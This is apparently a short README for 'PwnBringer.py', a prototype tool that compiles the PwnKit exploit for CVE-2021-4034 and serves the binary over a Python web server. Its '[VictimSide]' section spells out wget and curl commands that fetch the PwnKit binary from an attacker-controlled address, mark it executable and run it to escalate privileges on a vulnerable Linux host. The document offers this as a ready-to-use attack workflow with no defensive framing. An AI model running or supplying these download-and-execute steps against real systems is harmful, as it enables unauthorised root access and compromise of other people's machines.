
Automates the compilation and serving of the PwnKit exploit for CVE-2021-4034, enabling local privilege escalation on vulnerable Linux systems.
auto generate and Serve Of PwnKit
compile the source code to binary for pwnkit and automaticaly python server is on,
this is ProtoType so, perhaps not work depending on the environment.
chmod +x PwnBringer.py
./PwnBringer.py <lhost> <lport>

[VictimSide]
user1@deb:~$ wget http://192.168.0.4:1234/PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit
or
user1@deb:~$ curl http://192.168.0.4:1234/PwnKit -o PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit
